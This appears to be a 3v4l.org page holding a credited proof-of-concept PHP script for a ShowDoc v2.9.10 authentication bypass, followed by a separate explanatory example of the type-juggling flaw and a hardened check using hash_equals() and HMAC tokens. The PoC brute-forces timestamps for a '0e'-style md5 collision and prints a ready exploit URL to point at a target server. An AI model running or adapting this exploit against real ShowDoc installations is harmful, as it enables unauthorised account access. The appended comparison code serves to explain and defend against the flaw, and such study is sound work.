3v4l.org

run code in 300+ PHP versions simultaneously
<?php
// Credit: Qianxin, Network Security Department, Product-Safety Team ( Unc1e )
// Date: 2021/10/13
/*
ShowDoc v2.9.10 Auth Bypass PoC #2:
1) PHP Type Juggling (weak typing), see https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf
2) Using that: ('0e111' == '0e222') => (bool)true
3) This script uses brute-forcing to find a possible collision
*/
$username = 's'; // Forged username
$time = 1694131871; // 2023-09-08 08:11:11, always valid timestamp
$login_secret_key = '35d0b093f240cf6abedbe85fb174d317'; // a possible bin2hex( random_bytes( 16 ) );
$total = 1000000;
for ($i = 0; $i < (1000 * $total); $i++) { // try to find a solution in 1 billion numbers!
    $time += 1;
    $token = md5($username . $login_secret_key . $time);
    if (substr($token, 0, 2) === "0e") {
        if (preg_match('/^[0]+e[0-9]+$/', $token)) // 0e123, 00e123, ...
        {
            echo "time:$time, while final is: $token" . PHP_EOL;
        }
    }
    if (($i % $total) == 0) {
        echo "[" . ($i / $total) . "‰]" . PHP_EOL;
    }
}
echo "http://[showdoc]/server/?s=/api/extLogin/bySecretKey&username={$username}&time={$time}&token={$token}&redirect=" . PHP_EOL; // Please replace the [showdoc] to your target
?>

Abusive script

This script was stopped while abusing our resources
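The comparison weakness the PoC's header comment describes, next to a hardened check, as an added example that is not part of the original paste and is not ShowDoc's code. The function names, the HMAC key and all digest values below are constructed for illustration.

```php
<?php
// Hypothetical verifier with the weak pattern: loose comparison of two digests.
function verify_loose(string $expected, string $supplied): bool
{
    // Two numeric-looking strings are compared as numbers, so "0e..." == "0e...".
    return $expected == $supplied;
}

// Hardened verifier: byte-for-byte, constant-time string comparison.
function verify_strict(string $expected, string $supplied): bool
{
    return hash_equals($expected, $supplied);
}

// Hardened token (an assumption, not the product's scheme): keyed HMAC-SHA256
// with a field separator instead of md5() over concatenated fields.
function make_token(string $key, string $username, int $time): string
{
    return hash_hmac('sha256', $username . '|' . $time, $key);
}

// Audit helper: flags digests that loose comparison would treat as zero.
// Uses the same pattern the PoC above matches on.
function is_juggling_prone(string $digest): bool
{
    return preg_match('/^[0]+e[0-9]+$/', $digest) === 1;
}

// Constructed digest pairs: [expected, supplied].
$cases = [
    ['0e111', '0e222'],   // different strings, both evaluate to 0.0
    ['00e123', '0e999'],  // leading zeros still evaluate to 0.0
    ['0e111', '0'],       // a plain "0" also matches loosely
    ['35d0b0', '35d0b1'], // ordinary hex, differs: rejected by both
    ['35d0b0', '35d0b0'], // identical: accepted by both
];
foreach ($cases as [$expected, $supplied]) {
    printf("%-7s vs %-6s loose=%-5s strict=%-5s prone=%s\n",
        $expected, $supplied,
        var_export(verify_loose($expected, $supplied), true),
        var_export(verify_strict($expected, $supplied), true),
        var_export(is_juggling_prone($expected), true));
}

// Constructed key and inputs; the hardened token is only ever checked with hash_equals().
$token = make_token('constructed-demo-key', 'alice', 1700000000);
var_dump(verify_strict($token, make_token('constructed-demo-key', 'alice', 1700000000)));
```

The first three rows print `loose=true strict=false`, which is the gap between `==` and `hash_equals()`; the same result is obtained with `===`, but `hash_equals()` also avoids timing differences.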